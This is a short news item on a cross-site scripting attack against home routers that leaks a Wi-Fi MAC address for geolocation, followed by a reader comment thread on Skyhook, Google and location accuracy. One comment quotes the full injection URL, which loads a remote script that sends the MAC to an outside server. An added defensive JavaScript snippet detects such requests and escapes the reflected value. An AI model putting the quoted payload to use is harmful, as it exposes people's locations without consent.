Hacker pilfers browser GPS location via router attack

If you're surfing the web from a wireless router supplied by some of the biggest device makers, there's a chance Samy Kamkar can identify your geographic location. That's because WiFi access points made by Westell and others are vulnerable to XSS, or cross-site scripting, attacks that can siphon a device's media access control …

COMMENTS

This topic is closed for new posts.
  1. dkullmann
    Thumb Up

    Use this for good, not for evil

    Does anyone know Osama Bin Laden's MAC address?

  2. Anonymous Coward
    Stop

    Skyhook

    Anyone heard of Skyhook (www.skyhookwireless.com)? Guess what they keep a database of.

    No need to hack the routers as many admins have purposefully given their MAC addresses out to be used in public. Helps you find your location when GPS is suffering from an adverse dose of echoed signals rather than direct ones from the orbiting satellites.

    Doesn't sound like so much of a hack now does it?

    Regards

    Neil

    1. Jamie Jones Silver badge

      Huh?

      The hack is getting the MAC address off a user without their permission, therefore being able to find their position.

      Knowing *where* a MAC is located isn't the issue

  3. Frostbite
    FAIL

    Not accurate

    I tested mine and it said I was in Inglewood, Los Angeles, USA.

    Pity I'm in England, UK

    1. Anonymous Coward
      Happy

      The title is required, and must contain letters and/or digits.

      At least it means the Black Helicopter brigade cannot find us!

      My (UK based) is Washington DC, apparently.

      1. EnricoSuarve
        Black Helicopters

        be afraid

        That's because that's where all your communications are being fed via by the guys with the copters

  4. Brian Miller
    FAIL

    Bogus!

    Anybody bother to note the flaw in this? The MAC address is only valid on the immediate network connection. How can Google know about my MAC address after it passes through a router?

    Maybe this is a California FIOS vulnerability.

    1. Doc Savage
      Go

      Android

      Google's "Location Service", not sure about their web services, but certainly on Android, when Android registers with a WiFi network and you have 'Share my location data' and GPS enabled, then the MAC / SSID of the WiFi point you're connected to is sent to Google along with the GPS co-ordinates.

      I know this because I have an Android phone, and when using WiFi location before enabling GPS, it used the nearest cell station, now it puts the pinpoint on my house, with roughly a 100m "accuracy".

      Just another reason for NoScript - ABE stops sites accessing the local network.

      1. \\\

        Here's a title

        ============================

        I know this because I have an Android phone, and when using WiFi location before enabling GPS, it used the nearest cell station, now it puts the pinpoint on my house, with roughly a 100m "accuracy".

        ============================

        Exactly the same here. There are also different companies offering location-based services using wifi, e.g. Navizon.

    2. Anonymous Coward
      Headmaster

      Not bogus, rtfa.

      The mac address isn't being extracted from the packets somewhere downstream, as you indeed correctly point out that couldn't work. What part of "http://192.168.1.1/index.cgi?active_page=9098&req_mode=0&mimic_button_field=goto%3a+9098..&button_value=9098&ssid=samy%20was%20here%3Cscript%20src=http://samy.pl/mapxss/fiospwn.js%3E%3C/script%3E" don't you understand? ;-)

      It uses a cross-site request to access the router's admin page, and XSS to inject javascript into the html of that browser admin page that uses an XMLHttpRequest object to fetch the MAC address from the router and send it as a GET request parameter to a receiving script on the evil website. Relies only on HTTP between all the involved parties and no layer 2 properties at all. Should work anywhere. See http://samy.pl/mapxss/fiospwn.js for the internal details; the receiving script is http://samy.pl/mapxss/fiosmap.php and it expects the mac in "NN-NN-NN-NN-NN-NN" form as a url query string parameter named 'mac'.
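
The mechanism described in the comment above, seen from the defending side, as an added example that is not part of the thread or of any router's firmware: a request check in the spirit of the NoScript ABE rule mentioned earlier (a public page must not reach a LAN host), and the output encoding the router's admin page would need before echoing `ssid`. All function names are hypothetical, and the sample URL is constructed from the shape of the quoted one with a placeholder script host.

```javascript
// True for literal loopback / RFC 1918 IPv4 hosts, e.g. a home router at 192.168.1.1.
function isPrivateHost(host) {
  const m = /^(\d{1,3})\.(\d{1,3})\.\d{1,3}\.\d{1,3}$/.exec(host);
  if (!m) return host === 'localhost';
  const a = Number(m[1]), b = Number(m[2]);
  return a === 10 || a === 127 || (a === 192 && b === 168) ||
         (a === 172 && b >= 16 && b <= 31);
}

// Names of query parameters whose decoded value carries HTML markup
// (an opening/closing tag or an inline event-handler attribute).
function markupParams(url) {
  const hits = [];
  for (const [name, value] of new URL(url).searchParams) {
    if (/<\s*\/?\s*[a-z!]/i.test(value) || /\bon\w+\s*=/i.test(value)) hits.push(name);
  }
  return hits;
}

// ABE-style decision: a page on a public origin must not drive the browser
// to a private address. Markup in the query is reported as supporting evidence.
function checkRequest(originUrl, targetUrl) {
  const origin = new URL(originUrl);
  const target = new URL(targetUrl);
  const crossesIntoLan =
    isPrivateHost(target.hostname) && !isPrivateHost(origin.hostname);
  return { block: crossesIntoLan, suspiciousParams: markupParams(targetUrl) };
}

// Router-side fix: encode a reflected value before writing it into HTML,
// so a <script> element in `ssid` is rendered as text instead of executed.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed sample: same shape as the URL quoted above, placeholder script host.
const SAMPLE_TARGET = 'http://192.168.1.1/index.cgi?active_page=9098&req_mode=0' +
  '&ssid=demo%3Cscript%20src=http://example.invalid/x.js%3E%3C/script%3E';
const SAMPLE_ORIGIN = 'http://example.invalid/page.html';

const verdict = checkRequest(SAMPLE_ORIGIN, SAMPLE_TARGET);
console.log(verdict, escapeHtml(new URL(SAMPLE_TARGET).searchParams.get('ssid')));
```

A request the admin page makes to itself (origin `http://192.168.1.1/`) is not blocked by the first check, which is why the encoding fix on the router is still needed.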

  5. vincent himpe

    who cares.

    so they know in which room my router is installed. big whoop.

  6. Kevin McMurtrie Silver badge
    Black Helicopters

    Doin' the Evil

    The real story is Google is building a database mapping MACs to locations. A MAC alone doesn't provide any info so they must have quietly made deals with a lot of telcos and WiFi operators to gather data that normally isn't recorded for any length of time.

  7. Matthew Wright 1
    FAIL

    Geographically Challenged

    Sat in my living room in North East UK, and it says I'm in Downtown Madrid... maybe the snow's confusing it a little !

  8. Charles Manning

    GPS?

    Coordinates != GPS. Unless the Uncle Sam's Global Positioning System is used, it isn't GPS.

  9. RalphS
    Thumb Up

    Good fun

    I put the MAC of my wireless AP in, and it came back accurate to within a couple of houses (In West London). It didn't know about the ethernet MAC, and I was unable to extract the DSL one from the web interface.

    Maybe the street view cars collect the MACs of APs as they cruise around.

  10. Anonymous Coward

    Link to his web site

    Follow the link to his web site, see what happens.

  11. Anonymous Coward
    Thumb Up

    Skyhookwireless

    Top marks to the man who said go look at Skyhook Wireless.

    Skyhook's website has a reasonably detailed description of how they initially set up their database.

    If you have Google Maps for Mobile on your phone, and WiFi on your phone, you are using Skyhook's services.

    If the phone knows where it is (via GPS or via Skyhook) is it also potentially sniffing MAC addresses and updating not just your position on your map but also the locations in Skyhook's database of every MAC address it finds?

    People might like to know. This is why I stopped using GMM.

  12. Robin Bradshaw

    How it all works

    There was a talk about Skyhook Wireless and how it works at this year's Chaos Communication Congress:

    http://events.ccc.de/congress/2009/Fahrplan/events/3600.en.html

    It explains how all this works.

  13. Doug Glass
    Go

    Holy Yellow Pages Batman

    I'm in the phone book too!! Just Damn!

  14. Anonymous Coward

    Wtf

    MAC? Do they mean IP? If it some sort of database of MAC addresses, what happens when I buy a new router?

    "It's actually scary how accurate it is": apparently I'm in Kingston; oh, now I'm in Crawley. I agree, very scary.

  15. Anonymous Coward
    Paris Hilton

    "If it some sort of database of MAC addresses"

    "If it some sort of database of MAC addresses"

    There's no "if", it *is* a database of MAC addresses and their geographical locations.

    As you rightly point out, it is not 100% reliable, because MAC addresses aren't forever tied to the same place, and it is in principle possible for two bits of kit to have been modded to have the same MAC address.

    But for a lot of MAC addresses a lot of the time it is horrifyingly accurate.

    It does need something to ensure it is kept up to date, and grown to areas where it doesn't already have coverage. And what better for that than an on-the-quiet feed from every instance of Google Maps for Mobile on a WiFi-equipped phone? Nobody would expect Google to use people's data and activities for a rather different purpose than the end user was expecting, would they...

    Everybody knows where Paris is, even Americans.

  16. Tom Chiverton 1
    FAIL

    Doesn't work here

    Unsurprisingly, utter fail to locate my MAC.

  17. Anonymous Coward

    Err...

    It got me to within 10m of my house, all of the postcode, except the last two letters. I'm impressed and pissed off at the same time. I also don't have my wireless switched on all that often.

  18. Anonymous Coward
    Black Helicopters

    Google Street View?

    The Skyhook writeup I read some time ago said they seeded their database by working with a (US) courier delivery company whose vans were already carrying GPS locators. Skyhook added WiFi scanners to the fleet so wherever the vans went, they picked up the MAC addresses and know where they are. So everywhere the courier company has been, the MAC addresses and locations are known. If I remember rightly that was a one-off exercise.

    Skyhook's chosen courier company don't get everywhere, but we know someone who has near-100% coverage within selected areas.

    The Google Street View cars already have cameras and GPSs. If as they drive around in their target areas they are also scanning for WiFi MAC addresses (or BSSIDs as they seem to be called sometimes), you have near-100% coverage in a given area - at least till people buy a new router, move home, whatever.

    Once Street View leave the area you're presumably back to random "crowdsourced" updates from folks with smartphones etc.

  19. Anonymous Coward

    Street View - RalphS was first

    [AC 14:42 here]

    Sorry RalphS, missed your earlier mention of Street View here. Respect anyway.

    The WLAN MAC is (obviously) visible to a WiFi receiver, but the LAN (Ethernet) MAC is typically only going to be visible on the hardwired network. The DSL side of things doesn't have a MAC address as such. So the only interesting/useful one is the WLAN one.

  20. This post has been deleted by its author
